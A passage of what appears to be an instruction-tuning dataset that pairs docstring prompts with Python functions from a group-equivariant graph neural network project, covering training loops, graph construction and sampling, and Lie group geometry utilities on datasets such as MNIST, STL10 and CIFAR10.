+ sigmas=(1.0, config.eps, config.xi_1),
+ K=config.K,
+ path_to_graph=args.path_to_graph,
+ )
+ graph_lvl2 = SO3GEGraph(
+ size=[162, config.nalpha],
+ sigmas=(1.0, config.eps, config.xi_2),
+ K=config.K,
+ path_to_graph=args.path_to_graph,
+ )
+ graph_lvl3 = SO3GEGraph(
+ size=[642, config.nalpha],
+ sigmas=(1.0, config.eps, config.xi_3),
+ K=config.K,
+ path_to_graph=args.path_to_graph,
+ )
+ graph_lvl4 = SO3GEGraph(
+ size=[2562, config.nalpha],
+ sigmas=(1.0, config.eps, config.xi_4),
+ K=config.K,
+ path_to_graph=args.path_to_graph,
+ )
+ graph_lvl5 = SO3GEGraph(
+ size=[10242, config.nalpha],
+ sigmas=(1.0, config.eps, config.xi_5),
+ K=config.K,
+ path_to_graph=args.path_to_graph,
+ )
+ else:
+ graph_lvl0 = S2GEGraph(
+ size=[12, config.nalpha],
+ sigmas=(1.0, config.eps, config.xi_0),
+ K=config.K,
+ path_to_graph=args.path_to_graph,
+ )
+ graph_lvl1 = S2GEGraph(
+ size=[42, config.nalpha],
+ sigmas=(1.0, config.eps, config.xi_1),
+ K=config.K,
+ path_to_graph=args.path_to_graph,
+ )
+ graph_lvl2 = S2GEGraph(
+ size=[162, config.nalpha],
+ sigmas=(1.0, config.eps, config.xi_2),
+ K=config.K,
+ path_to_graph=args.path_to_graph,
+ )
+ graph_lvl3 = S2GEGraph(
+ size=[642, config.nalpha],
+ sigmas=(1.0, config.eps, config.xi_3),
+ K=config.K,
+ path_to_graph=args.path_to_graph,
+ )
+ graph_lvl4 = S2GEGraph(
+ size=[2562, config.nalpha],
+ sigmas=(1.0, config.eps, config.xi_4),
+ K=config.K,
+ path_to_graph=args.path_to_graph,
+ )
+ graph_lvl5 = S2GEGraph(
+ size=[10242, config.nalpha],
+ sigmas=(1.0, config.eps, config.xi_5),
+ K=config.K,
+ path_to_graph=args.path_to_graph,
+ )
+ output_graph = S2GEGraph(
+ size=[10242, 1],
+ sigmas=(1.0, 1.0, 1.0),
+ K=config.K,
+ path_to_graph=args.path_to_graph,
+ )
+ model = SO3GEUChebNet(
+ 16,
+ 3,
+ config.kernel_size,
+ graph_lvl0,
+ graph_lvl1,
+ graph_lvl2,
+ graph_lvl3,
+ graph_lvl4,
+ graph_lvl5,
+ output_graph,
+ args.reduction,
+ args.expansion,
+ ).to(device)
+ wandb.log({"capacity": capacity(model)})
+ optimizer = Adam(model.parameters(), lr=args.lr)
+ train_loader, _ = get_train_val_loaders(
+ "artc",
+ batch_size=args.batch_size,
+ num_layers=config.nalpha,
+ val_ratio=0.0,
+ path_to_data=args.path_to_data,
+ )
+ test_loader = get_test_loader(
+ "artc", batch_size=args.batch_size, num_layers=config.nalpha, path_to_data=args.path_to_data
+ )
+ trainer = create_supervised_trainer(
+ graph=graph_lvl5,
+ model=model,
+ optimizer=optimizer,
+ loss_fn=nll_loss,
+ device=device,
+ prepare_batch=prepare_batch,
+ )
+ ProgressBar(persist=False, desc="Training").attach(trainer)
+ cm = ConfusionMatrix(num_classes=3)
+ miou = mIoU(cm)
+ miou_wo_bg = mIoU(cm, ignore_index=0)
+ f1 = Fbeta(1, precision=Precision(average=False), recall=Recall(average=False))
+ acc_bg = PerClassAccuracy(0)
+ acc_ar = PerClassAccuracy(1)
+ acc_tc = PerClassAccuracy(2)
+ mean_average_precision = AveragePrecision(output_transform=output_transform_mAP)
+ loss = Loss(nll_loss)
+ metrics = {
+ "test_F1": f1,
+ "test_mIoU": miou,
+ "test_mIoU_bg": miou_wo_bg,
+ "test_loss": loss,
+ "test_acc_bg": acc_bg,
+ "test_acc_ar": acc_ar,
+ "test_acc_tc": acc_tc,
+ "test_mAP": mean_average_precision,
+ }
+ evaluator = create_supervised_evaluator(
+ graph=graph_lvl5,
+ model=model,
+ metrics=metrics,
+ device=device,
+ prepare_batch=prepare_batch,
+ )
+ ProgressBar(persist=False, desc="Evaluation").attach(evaluator)
+ _ = trainer.add_event_handler(Events.EPOCH_COMPLETED, wandb_log, evaluator, test_loader)
+ trainer.run(train_loader, max_epochs=args.max_epochs)
+[INST] Gets training configuration for bayesian hyper-parameters optimization.. [/INST] def build_sweep_config() -> dict:
+ sweep_config = {
+ "method": "bayes",
+ "metric": {"name": "validation_accuracy", "goal": "maximize"},
+ }
+ parameters = {
+ "batch_size": {"distribution": "categorical", "values": [8, 16, 32]},
+ "kernel_size": {"distribution": "categorical", "values": [2, 3, 4, 5, 6]},
+ "K": {"distribution": "categorical", "values": [8, 16, 32]},
+ "xi": {"distribution": "log_uniform", "min": math.log(1e-4), "max": math.log(1e-1)},
+ "ntheta": {"distribution": "int_uniform", "min": 2, "max": 9},
+ "eps": {"distribution": "log_uniform", "min": math.log(1e-2), "max": math.log(1)},
+ }
+ sweep_config["parameters"] = parameters
+ return sweep_config
+[INST] Bayesian hyper-parameters optimization on CIFAR10.. [/INST] def train(config=None):
+ with wandb.init(config=config):
+ config = wandb.config
+ wandb.log({"dataset": "cifar10"})
+ wandb.log(vars(args))
+ device = torch.device("cuda" if torch.cuda.is_available() and args.cuda else "cpu")
+ graph_lvl0 = SE2GEGraph(
+ [8, 8, config.ntheta],
+ K=config.K,
+ sigmas=(1.0, config.eps, config.xi * 16),
+ path_to_graph=args.path_to_graph,
+ )
+ graph_lvl1 = SE2GEGraph(
+ [16, 16, config.ntheta],
+ K=config.K,
+ sigmas=(1.0, config.eps, config.xi * 4),
+ path_to_graph=args.path_to_graph,
+ )
+ graph_lvl2 = SE2GEGraph(
+ [32, 32, config.ntheta],
+ K=config.K,
+ sigmas=(1.0, config.eps, config.xi),
+ path_to_graph=args.path_to_graph,
+ )
+ model = WideResSE2GEChebNet(
+ in_channels=3,
+ out_channels=10,
+ kernel_size=config.kernel_size,
+ graph_lvl0=graph_lvl0,
+ graph_lvl1=graph_lvl1,
+ graph_lvl2=graph_lvl2,
+ res_depth=args.res_depth,
+ widen_factor=args.widen_factor,
+ reduction=args.reduction if args.pool else None,
+ ).to(device)
+ wandb.log({"capacity": capacity(model)})
+ optimizer = Adam(model.parameters(), lr=args.lr)
+ train_loader, val_loader = get_train_val_loaders(
+ "cifar10",
+ batch_size=config.batch_size,
+ val_ratio=0.3,
+ path_to_data=args.path_to_data,
+ )
+ trainer = create_supervised_trainer(
+ graph=graph_lvl2,
+ model=model,
+ optimizer=optimizer,
+ loss_fn=nll_loss,
+ device=device,
+ prepare_batch=prepare_batch,
+ )
+ ProgressBar(persist=False, desc="Training").attach(trainer)
+ metrics = {"validation_accuracy": Accuracy(), "validation_loss": Loss(nll_loss)}
+ evaluator = create_supervised_evaluator(
+ graph=graph_lvl2,
+ model=model,
+ metrics=metrics,
+ device=device,
+ prepare_batch=prepare_batch,
+ )
+ ProgressBar(persist=False, desc="Evaluation").attach(evaluator)
+ trainer.add_event_handler(Events.EPOCH_COMPLETED, wandb_log, evaluator, val_loader)
+ trainer.run(train_loader, max_epochs=args.max_epochs)
+[INST] Trains a model on STL10 and evaluates its performance on STL10, Flip-STL10 and 90Rot-STL10.. [/INST] def train(config=None):
+ with wandb.init(config=config, project="cheblienet"):
+ config = wandb.config
+ wandb.log({"dataset": "stl10"})
+ wandb.log(vars(args))
+ device = torch.device("cuda" if torch.cuda.is_available() and args.cuda else "cpu")
+ if args.anisotropic:
+ graph_lvl0 = SE2GEGraph(
+ [24, 24, config.ntheta],
+ K=config.K,
+ sigmas=(1.0, config.eps, config.xi_0),
+ path_to_graph=args.path_to_graph,
+ )
+ graph_lvl1 = SE2GEGraph(
+ [48, 48, config.ntheta],
+ K=config.K,
+ sigmas=(1.0, config.eps, config.xi_1),
+ path_to_graph=args.path_to_graph,
+ )
+ graph_lvl2 = SE2GEGraph(
+ [96, 96, config.ntheta],
+ K=config.K,
+ sigmas=(1.0, config.eps, config.xi_2),
+ path_to_graph=args.path_to_graph,
+ )
+ else:
+ graph_lvl0 = R2GEGraph(
+ [24, 24, 1],
+ K=config.K,
+ sigmas=(1.0, config.eps, config.xi_0),
+ path_to_graph=args.path_to_graph,
+ )
+ graph_lvl1 = R2GEGraph(
+ [48, 48, 1],
+ K=config.K,
+ sigmas=(1.0, config.eps, config.xi_1),
+ path_to_graph=args.path_to_graph,
+ )
+ graph_lvl2 = R2GEGraph(
+ [96, 96, 1],
+ K=config.K,
+ sigmas=(1.0, config.eps, config.xi_2),
+ path_to_graph=args.path_to_graph,
+ )
+ model = WideResSE2GEChebNet(
+ in_channels=3,
+ out_channels=10,
+ kernel_size=config.kernel_size,
+ graph_lvl0=graph_lvl0,
+ graph_lvl1=graph_lvl1,
+ graph_lvl2=graph_lvl2,
+ res_depth=args.res_depth,
+ widen_factor=args.widen_factor,
+ reduction=args.reduction,
+ ).to(device)
+ wandb.log({"capacity": capacity(model)})
+ optimizer = Adam(model.parameters(), lr=args.lr)
+ train_loader, _ = get_train_val_loaders(
+ "stl10",
+ batch_size=args.batch_size,
+ val_ratio=0.0,
+ num_layers=config.ntheta,
+ path_to_data=args.path_to_data,
+ )
+ test_loader = get_test_loader(
+ "stl10", batch_size=args.batch_size, num_layers=config.ntheta, path_to_data=args.path_to_data
+ )
+ trainer = create_supervised_trainer(
+ graph=graph_lvl2,
+ model=model,
+ optimizer=optimizer,
+ loss_fn=nll_loss,
+ device=device,
+ prepare_batch=prepare_batch,
+ )
+ ProgressBar(persist=False, desc="Training").attach(trainer)
+ metrics = {"test_accuracy": Accuracy(), "test_loss": Loss(nll_loss)}
+ evaluator = create_supervised_evaluator(
+ graph=graph_lvl2,
+ model=model,
+ metrics=metrics,
+ device=device,
+ prepare_batch=prepare_batch,
+ )
+ ProgressBar(persist=False, desc="Evaluation").attach(evaluator)
+ trainer.add_event_handler(Events.EPOCH_COMPLETED, wandb_log, evaluator, test_loader)
+ trainer.run(train_loader, max_epochs=args.max_epochs)
+[INST] Factory function for creating a trainer for supervised models.. [/INST] def create_supervised_trainer(
+ graph,
+ model,
+ optimizer,
+ loss_fn,
+ device=None,
+ prepare_batch=None,
+ output_transform=None,
+):
+ device = device or torch.device("cpu")
+ prepare_batch = prepare_batch if prepare_batch is not None else lambda x, y: (x, y)
+ output_transform = output_transform if output_transform is not None else lambda x, y, y_pred, loss: loss.item()
+ def _update(engine, batch):
+ model.train()
+ optimizer.zero_grad()
+ x, y = prepare_batch(batch, graph, device)
+ y_pred = model(x)
+ loss = loss_fn(y_pred, y)
+ loss.backward()
+ optimizer.step()
+ return output_transform(x, y, y_pred, loss)
+ trainer = Engine(_update)
+ return trainer
+[INST] Factory function for creating an evaluator for supervised models.. [/INST] def create_supervised_evaluator(graph, model, metrics=None, device=None, prepare_batch=None, output_transform=None):
+ metrics = metrics or {}
+ device = device or torch.device("cpu")
+ prepare_batch = prepare_batch if prepare_batch is not None else lambda x, y: (x, y)
+ output_transform = output_transform if output_transform is not None else lambda x, y, y_pred: (y_pred, y)
+ def _inference(engine, batch):
+ model.eval()
+ with torch.no_grad():
+ x, y = prepare_batch(batch, graph, device)
+ y_pred = model(x)
+ return output_transform(x, y, y_pred)
+ evaluator = Engine(_inference)
+ for name, metric in metrics.items():
+ metric.attach(evaluator, name)
+ return evaluator
+[INST] Download the dataset if it doesn't already exist.. [/INST] def download(self):
+ if not self.check_exists():
+ download_and_extract_archive(self.resource, download_root=os.path.split(self.path_to_data)[0])
+ else:
+ print("Data already exists")
+[INST] Check if dataset already exists.. [/INST] def check_exists(self):
+ return os.path.exists(self.path_to_data)
+[INST] Return a new tensor filled with rotation matrices.. [/INST] def rotation_matrix(angle, axis, device=None):
+ R = torch.zeros(angle.nelement(), 3, 3, device=device)
+ cos = torch.cos(angle)
+ sin = torch.sin(angle)
+ if axis == "x":
+ R[..., 0, 0] = 1.0
+ R[..., 1, 1] = cos
+ R[..., 1, 2] = -sin
+ R[..., 2, 1] = sin
+ R[..., 2, 2] = cos
+ if axis == "y":
+ R[..., 0, 0] = cos
+ R[..., 0, 2] = sin
+ R[..., 2, 0] = -sin
+ R[..., 2, 2] = cos
+ R[..., 1, 1] = 1.0
+ if axis == "z":
+ R[..., 0, 0] = cos
+ R[..., 0, 1] = -sin
+ R[..., 1, 0] = sin
+ R[..., 1, 1] = cos
+ R[..., 2, 2] = 1.0
+ return R
+[INST] Return new tensors corresponding to angle representation from the cartesian representation.
+Warning: x, y, z have to be on the 1-sphere.. [/INST] def xyz2betagamma(x, y, z):
+ beta = torch.acos(z)
+ gamma = torch.atan2(y, x)
+ return beta, gamma
+[INST] Returns new tensors corresponding to angle representation from the cartesian representation.. [/INST] def betagamma2xyz(beta, gamma, axis=None):
+ if axis == "x":
+ return torch.sin(beta) * torch.cos(gamma)
+ if axis == "y":
+ return torch.sin(beta) * torch.sin(gamma)
+ if axis == "z":
+ return torch.cos(beta)
+ x = torch.sin(beta) * torch.cos(gamma)
+ y = torch.sin(beta) * torch.sin(gamma)
+ z = torch.cos(beta)
+ return x, y, z
+[INST] Check if input is a numpy object.. [/INST] def _is_numpy(input):
+ return isinstance(input, np.ndarray)
+[INST] Convert a ``PIL Image`` to a tensor of the same type.
+This function does not support torchscript.. [/INST] def pil_to_tensor(input):
+ if not _is_pil_image(input):
+ raise TypeError("input should be PIL Image. Got {}".format(type(input)))
+ default_float_dtype = torch.get_default_dtype()
+ if input.mode == "I":
+ output = torch.from_numpy(np.array(input, np.int32, copy=False))
+ elif input.mode == "I;16":
+ output = torch.from_numpy(np.array(input, np.int16, copy=False))
+ elif input.mode == "F":
+ output = torch.from_numpy(np.array(input, np.float32, copy=False))
+ elif input.mode == "1":
+ output = 255 * torch.from_numpy(np.array(input, np.uint8, copy=False))
+ else:
+ output = torch.ByteTensor(torch.ByteStorage.from_buffer(input.tobytes()))
+ output = output.view(input.size[1], input.size[0], len(input.getbands()))
+ output = output.permute((2, 0, 1)).contiguous()
+ if isinstance(output, torch.ByteTensor):
+ return output.to(dtype=default_float_dtype).div(255)
+ else:
+ return output
+[INST] Return the diffusion kernel of the graph specified by the kernel input.. [/INST] def diff_kernel(self, kernel):
+ lambdas, Phi = self.get_eigen_space()
+ return Phi @ np.diag(kernel(lambdas)) @ Phi.T
+[INST] Return the total number of vertices of the graph.. [/INST] def num_vertices(self):
+ return self.vertex_index.shape[0]
+[INST] Return the total number of edges of the graph.. [/INST] def num_edges(self):
+ return self.edge_index.shape[1]
+[INST] Returns the vertex's neighborhood.. [/INST] def neighborhood(self, vertex_index):
+ if not vertex_index in self.vertex_index:
+ raise ValueError(f"{vertex_index} is not a valid vertex index")
+ mask = self.edge_index[0] == vertex_index
+ return self.edge_index[1, mask], self.edge_weight[mask], self.edge_sqdist[mask]
+[INST] Save graph's attributes.. [/INST] def save(self, path_to_graph):
+ os.makedirs(path_to_graph, exist_ok=True)
+ torch.save(self.vertex_index, os.path.join(path_to_graph, f"{self.hash_repr()}_vertex_index.pt"))
+ torch.save(self.edge_index, os.path.join(path_to_graph, f"{self.hash_repr()}_edge_index.pt"))
+ torch.save(self.edge_sqdist, os.path.join(path_to_graph, f"{self.hash_repr()}_edge_sqdist.pt"))
+ torch.save(self.edge_weight, os.path.join(path_to_graph, f"{self.hash_repr()}_edge_weight.pt"))
+ for vertex_attr in self.vertex_attributes:
+ torch.save(getattr(self, vertex_attr), os.path.join(path_to_graph, f"{self.hash_repr()}_{vertex_attr}.pt"))
+[INST] Load graph's attributes.. [/INST] def load(self, path_to_graph):
+ self.vertex_index = torch.load(os.path.join(path_to_graph, f"{self.hash_repr()}_vertex_index.pt"))
+ self.edge_index = torch.load(os.path.join(path_to_graph, f"{self.hash_repr()}_edge_index.pt"))
+ self.edge_sqdist = torch.load(os.path.join(path_to_graph, f"{self.hash_repr()}_edge_sqdist.pt"))
+ self.edge_weight = torch.load(os.path.join(path_to_graph, f"{self.hash_repr()}_edge_weight.pt"))
+ for vertex_attr in self.vertex_attributes:
+ setattr(self, vertex_attr, torch.load(os.path.join(path_to_graph, f"{self.hash_repr()}_{vertex_attr}.pt")))
+[INST] Reinitialize random sub-graph vertices and edges' attributes.. [/INST] def reinit(self):
+ print("Reinit graph...")
+ if hasattr(self, "laplacian"):
+ del self.laplacian
+ self.vertex_index = self.graph.vertex_index.clone()
+ self.sub_vertex_index = self.vertex_index.clone()
+ for attr in self.graph.vertex_attributes:
+ setattr(self, attr, getattr(self.graph, attr))
+ self.edge_index = self.graph.edge_index.clone()
+ self.edge_weight = self.graph.edge_weight.clone()
+ self.edge_sqdist = self.graph.edge_sqdist.clone()
+ print("Done!")
+[INST] Randomly samples a given rate of edges from the original graph to generate a random sub-graph.
+The graph is assumed to be undirected and the probability for an edge to be sampled is proportional
+to its weight.. [/INST] def edges_sampling(self, rate):
+ print("Sample edges...")
+ mask = self.graph.edge_index[0] < self.graph.edge_index[1]
+ edge_index = self.graph.edge_index[..., mask]
+ edge_weight = self.graph.edge_weight[mask]
+ edge_sqdist = self.graph.edge_sqdist[mask]
+ num_samples = math.ceil(rate * edge_weight.nelement())
+ sampled_edges = torch.multinomial(edge_weight, num_samples)
+ sampled_edge_index = edge_index[..., sampled_edges]
+ sampled_edge_weight = edge_weight[sampled_edges]
+ sampled_edge_sqdist = edge_sqdist[sampled_edges]
+ self.edge_index = torch.cat((sampled_edge_index.flip(0), sampled_edge_index), 1)
+ self.edge_weight = sampled_edge_weight.repeat(2)
+ self.edge_sqdist = sampled_edge_sqdist.repeat(2)
+ print("Done!")
+[INST] Randomly samples a given rate of vertices from the original graph to generate a random subgraph.
+All the vertices have the same probability being sampled and at the end of the algorithm, it only remains
+edges between sampled vertices.
+
+vertices' sampling is not compatible with pooling and unpooling operations for now. [/INST] def vertices_sampling(self, rate):
+ print("Sample vertices...")
+ num_samples = math.floor(rate * self.graph.num_vertices)
+ sampled_vertices, _ = torch.multinomial(torch.ones(self.graph.num_vertices), num_samples).sort()
+ self.vertex_index = torch.arange(num_samples)
+ self.sub_vertex_index = sampled_vertices.clone()
+ for attr in self.graph.vertex_attributes:
+ setattr(self, attr, getattr(self.graph, attr)[sampled_vertices])
+ vertex_mapping = torch.empty(self.graph.num_vertices, dtype=torch.long).fill_(-1)
+ vertex_mapping[self.graph.vertex_index[sampled_vertices]] = self.vertex_index
+ edge_index = vertex_mapping[self.graph.edge_index]
+ mask = (edge_index[0] >= 0) & (edge_index[1] >= 0)
+ self.edge_index = edge_index[:, mask]
+ self.edge_weight = self.graph.edge_weight[mask]
+ self.edge_sqdist = self.graph.edge_sqdist[mask]
+ print("Done!")
+[INST] Returns the cartesian position of the graph's vertices.. [/INST] def cartesian_pos(self, axis=None):
+ x, y, z = self.graph.cartesian_pos()
+ if axis == "x":
+ return x[self.sub_vertex_index]
+ if axis == "y":
+ return y[self.sub_vertex_index]
+ if axis == "z":
+ return z[self.sub_vertex_index]
+ return x[self.sub_vertex_index], y[self.sub_vertex_index], z[self.sub_vertex_index]
+[INST] Returns the graph's vertices attributes.. [/INST] def vertex_attributes(self):
+ return self.graph.vertex_attributes
+[INST] Return the riemannian squared distance between GL(3) group elements Gg and Gh according to the
+riemannian metric Re.. [/INST] def riemannian_sqdist(self, Gg, Gh, Re):
+ return se2_riemannian_sqdist(Gg, Gh, Re)
+[INST] Return the group elements of graph's vertices.. [/INST] def group_element(self):
+ return self.vertex_x, self.vertex_y, self.vertex_theta
+[INST] Return the general linear group elements of graph's vertices.. [/INST] def general_linear_group_element(self):
+ return se2_matrix(self.vertex_x, self.vertex_y, self.vertex_theta)
+[INST] Return the name of the group's dimensions.. [/INST] def group_dim(self):
+ return ["x", "y", "theta"]
+[INST] Return the cartesian positions of the graph's vertices.. [/INST] def cartesian_pos(self, axis=None):
+ if axis is None:
+ return self.vertex_x, self.vertex_y, self.vertex_theta
+ if axis == "x":
+ return self.vertex_x
+ if axis == "y":
+ return self.vertex_y
+ if axis == "z":
+ return self.vertex_theta
+[INST] Returns the graph's vertices attributes.. [/INST] def vertex_attributes(self):
+ return ("vertex_x", "vertex_y", "vertex_theta")
+[INST] Return the riemannian squared distance between GL(3) group elements Gg and Gh according to the
+riemannian metric Re.. [/INST] def riemannian_sqdist(self, Gg, Gh, Re):
+ return r2_riemannian_sqdist(Gg, Gh, Re)
+[INST] Return the group elements of graph's vertices.. [/INST] def group_element(self):
+ return self.vertex_x, self.vertex_y
+[INST] Return the general linear group elements of graph's vertices.. [/INST] def general_linear_group_element(self):
+ return r2_matrix(self.vertex_x, self.vertex_y)
+[INST] Return the name of the group's dimensions.. [/INST] def group_dim(self):
+ return ["x", "y"]
+[INST] Return the cartesian positions of the graph's vertices.. [/INST] def cartesian_pos(self, axis=None):
+ if axis is None:
+ return self.vertex_x, self.vertex_y, torch.zeros(self.num_vertices)
+ if axis == "x":
+ return self.vertex_x
+ if axis == "y":
+ return self.vertex_y
+ if axis == "z":
+ return torch.zeros(self.num_vertices)
+[INST] Returns the graph's vertices attributes.. [/INST] def vertex_attributes(self):
+ return ("vertex_x", "vertex_y")
+[INST] Return the riemannian squared distance between GL(3) group elements Gg and Gh according to the
+riemannian metric Re.. [/INST] def riemannian_sqdist(self, Gg, Gh, Re):
+ return so3_riemannian_sqdist(Gg, Gh, Re)
+[INST] Return the group elements of graph's vertices.. [/INST] def group_element(self):
+ return self.vertex_alpha, self.vertex_beta, self.vertex_gamma
+[INST] Return the general linear group elements of graph's vertices.. [/INST] def general_linear_group_element(self):
+ return so3_matrix(self.vertex_alpha, self.vertex_beta, self.vertex_gamma)
+[INST] Return the name of the group's dimensions.. [/INST] def group_dim(self):
+ return ["alpha", "beta", "gamma"]
+[INST] Return the cartesian positions of the graph's vertices.. [/INST] def cartesian_pos(self, axis=None):
+ if not axis is None:
+ return (2 * math.pi + self.vertex_alpha) * betagamma2xyz(self.vertex_beta, self.vertex_gamma, axis)
+ x, y, z = betagamma2xyz(self.vertex_beta, self.vertex_gamma, axis)
+ x *= 2 * math.pi + self.vertex_alpha
+ y *= 2 * math.pi + self.vertex_alpha
+ z *= 2 * math.pi + self.vertex_alpha
+ return x, y, z
+[INST] Returns the graph's vertices attributes.. [/INST] def vertex_attributes(self):
+ return ("vertex_alpha", "vertex_beta", "vertex_gamma")
+[INST] Return the riemannian squared distance between GL(3) group elements Gg and Gh according to the
+riemannian metric Re.. [/INST] def riemannian_sqdist(self, Gg, Gh, Re):
+ return s2_riemannian_sqdist(Gg, Gh, Re)
+[INST] Return the group elements of graph's vertices.. [/INST] def group_element(self):
+ return self.vertex_beta, self.vertex_gamma
+[INST] Return the general linear group elements of graph's vertices.. [/INST] def general_linear_group_element(self):
+ return s2_matrix(self.vertex_beta, self.vertex_gamma)
+[INST] Return the name of the group's dimensions.. [/INST] def group_dim(self):
+ return ["beta", "gamma"]
+[INST] Return the cartesian positions of the graph's vertices.. [/INST] def cartesian_pos(self, axis=None):
+ return betagamma2xyz(self.vertex_beta, self.vertex_gamma, axis)
+[INST] Returns the graph's vertices attributes.. [/INST] def vertex_attributes(self):
+ return ("vertex_beta", "vertex_gamma")
+[INST] Returns a new tensor corresponding to matrix formulation of the given input tensors representing
+R(2) group elements.. [/INST] def r2_matrix(x, y, device=None):
+ G = torch.zeros((x.nelement(), 3, 3), device=device)
+ G[..., 0, 2] = x
+ G[..., 1, 2] = y
+ G[..., 0, 0] = 1.0
+ G[..., 1, 1] = 1.0
+ G[..., 2, 2] = 1.0
+ return G
+[INST] Returns a new tensor corresponding to matrix formulation of the given input tensors representing
+SE(2) group elements.. [/INST] def se2_matrix(x, y, theta, device=None):
+ G = rotation_matrix(theta, "z", device=device)
+ G[:, 0, 2] = x
+ G[:, 1, 2] = y
+ return G
+[INST] Returns a new tensor corresponding to the inverse of the group elements in matrix formulation.. [/INST] def r2_inverse(G):
+ return torch.inverse(G)
+[INST] Returns a new tensor corresponding to the inverse of the group elements in matrix formulation.. [/INST] def se2_inverse(G):
+ return torch.inverse(G)
+[INST] Returns three new tensors corresponding to x, y and theta attributes of the group elements specified by the
+se2 group elements in matrix formulation.. [/INST] def se2_element(G):
+ return G[..., 0, 2], G[..., 1, 2], torch.atan2(G[..., 1, 0], G[..., 0, 0])
+[INST] Returns a new tensor containing the riemannnian logarithm of the group elements in matrix formulation.. [/INST] def r2_log(G):
+ x, y = r2_element(G)
+ c1 = x
+ c2 = y
+ c3 = torch.zeros_like(c1)
+ c = torch.stack((c1, c2, c3), dim=-1).unsqueeze(2)
+ return c
+[INST] Returns a new tensor containing the riemannnian logarithm of the group elements in matrix formulation.. [/INST] def se2_log(G):
+ x, y, theta = se2_element(G)
+ c1 = theta / 2 * (y + x * torch.cos(theta / 2) / torch.sin(theta / 2))
+ c2 = -theta / 2 * (x + y * torch.cos(theta / 2) / torch.sin(theta / 2))
+ c3 = theta.clone()
+ mask = theta == 0.0
+ c1[mask] = x[mask]
+ c2[mask] = y[mask]
+ c = torch.stack((c1, c2, c3), dim=-1).unsqueeze(2)
+ return c
+[INST] Return the squared riemannian distances between group elements in matrix formulation.. [/INST] def r2_riemannian_sqdist(Gg, Gh, Re):
+ G = torch.matmul(r2_inverse(Gg), Gh)
+ return weighted_norm(r2_log(G), Re)
+[INST] Returns the squared riemannian distances between group elements in matrix formulation.. [/INST] def se2_riemannian_sqdist(Gg, Gh, Re):
+ G = torch.matmul(se2_inverse(Gg), Gh)
+ x, y, theta = se2_element(G)
+ sqdist1 = weighted_norm(se2_log(se2_matrix(x, y, theta)), Re)
+ sqdist2 = weighted_norm(se2_log(se2_matrix(x, y, theta - math.pi)), Re)
+ sqdist3 = weighted_norm(se2_log(se2_matrix(x, y, theta + math.pi)), Re)
+ sqdist, _ = torch.stack((sqdist1, sqdist2, sqdist3)).min(dim=0)
+ return sqdist
+[INST] Trains a model on MNIST and evaluates its performance on MNIST, Flip-MNIST and 90Rot-MNIST.. [/INST] def train(config=None):
+ with wandb.init(config=config, project="cheblienet"):
+ config = wandb.config
+ wandb.log({"dataset": "mnist"})
+ wandb.log(vars(args))
+ device = torch.device("cuda" if torch.cuda.is_available() and args.cuda else "cpu")
+ if args.anisotropic:
+ graph = SE2GEGraph(
+ [28, 28, config.ntheta],
+ K=config.K,
+ sigmas=(1.0, config.eps, config.xi),
+ path_to_graph=args.path_to_graph,
+ )
+ else:
+ graph = R2GEGraph(
+ [28, 28, config.ntheta],
+ K=config.K,
+ sigmas=(1.0, config.eps, config.xi),
+ path_to_graph=args.path_to_graph,
+ )
+ sub_graph = RandomSubGraph(graph)
+ model = WideResSE2GEChebNet(
+ in_channels=1,
+ out_channels=10,
+ kernel_size=config.kernel_size,
+ graph_lvl0=sub_graph,
+ res_depth=args.res_depth,
+ widen_factor=args.widen_factor,
+ ).to(device)
+ wandb.log({"capacity": capacity(model)})
+ optimizer = Adam(model.parameters(), lr=args.lr)
+ train_loader, _ = get_train_val_loaders(
+ "mnist",
+ num_layers=config.ntheta,
+ batch_size=args.batch_size,
+ val_ratio=0.0,
+ path_to_data=args.path_to_data,
+ )
+ (classic_test_loader, rotated_test_loader, flipped_test_loader,) = get_equiv_test_loaders(
+ "mnist", num_layers=config.ntheta, batch_size=args.batch_size, path_to_data=args.path_to_data
+ )
+ trainer = create_supervised_trainer(
+ graph=sub_graph,
+ model=model,
+ optimizer=optimizer,
+ loss_fn=nll_loss,
+ device=device,
+ prepare_batch=prepare_batch,
+ )
+ ProgressBar(persist=False, desc="Training").attach(trainer)
+ classic_metrics = {"classic_test_accuracy": Accuracy(), "classic_test_loss": Loss(nll_loss)}
+ rotated_metrics = {"rotated_test_accuracy": Accuracy(), "rotated_test_loss": Loss(nll_loss)}
+ flipped_metrics = {"flipped_test_accuracy": Accuracy(), "flipped_test_loss": Loss(nll_loss)}
+ classic_evaluator = create_supervised_evaluator(
+ graph=sub_graph,
+ model=model,
+ metrics=classic_metrics,
+ device=device,
+ prepare_batch=prepare_batch,
+ )
+ ProgressBar(persist=False, desc="Evaluation").attach(classic_evaluator)
+ rotated_evaluator = create_supervised_evaluator(
+ graph=sub_graph,
+ model=model,
+ metrics=rotated_metrics,
+ device=device,
+ prepare_batch=prepare_batch,
+ )
+ ProgressBar(persist=False, desc="Evaluation").attach(rotated_evaluator)
+ flipped_evaluator = create_supervised_evaluator(
+ graph=sub_graph,
+ model=model,
+ metrics=flipped_metrics,
+ device=device,
+ prepare_batch=prepare_batch,
+ )
+ ProgressBar(persist=False, desc="Evaluation").attach(flipped_evaluator)
+ if args.sample_edges or args.sample_vertices:
+ trainer.add_event_handler(
+ Events.ITERATION_STARTED,
+ sub_graph.reinit,
+ )
+ trainer.add_event_handler(
+ Events.EPOCH_COMPLETED,
+ sub_graph.reinit,
+ )
+ if args.sample_vertices:
+ trainer.add_event_handler(
+ Events.ITERATION_STARTED,
+ sub_graph.vertices_sampling,
+ args.vertices_rate,
+ )
+ if args.sample_edges:
+ trainer.add_event_handler(
+ Events.ITERATION_STARTED,
+ sub_graph.edges_sampling,
+ args.edges_rate,
+ )
+ if args.save_models:
+ gst = lambda *_: trainer.state.epoch
+ handler = Checkpoint(
+ {"model": model}, DiskSaver(args.path_to_model, create_dir=True), n_saved=5, global_step_transform=gst
+ )
+ trainer.add_event_handler(Events.EPOCH_COMPLETED, handler)
+ trainer.add_event_handler(Events.EPOCH_COMPLETED, wandb_log, classic_evaluator, classic_test_loader)
+ trainer.add_event_handler(Events.EPOCH_COMPLETED, wandb_log, rotated_evaluator, rotated_test_loader)
+ trainer.add_event_handler(Events.EPOCH_COMPLETED, wandb_log, flipped_evaluator, flipped_test_loader)
+ trainer.run(train_loader, max_epochs=args.max_epochs)
+[INST] Visualize graph's vertices.. [/INST] def visualize_graph(graph):
+ df = pd.DataFrame({"vertex_index": graph.vertex_index})
+ df["X"], df["Y"], df["Z"] = graph.cartesian_pos()
+ for attr in graph.vertex_attributes:
+ df[attr] = getattr(graph, attr)
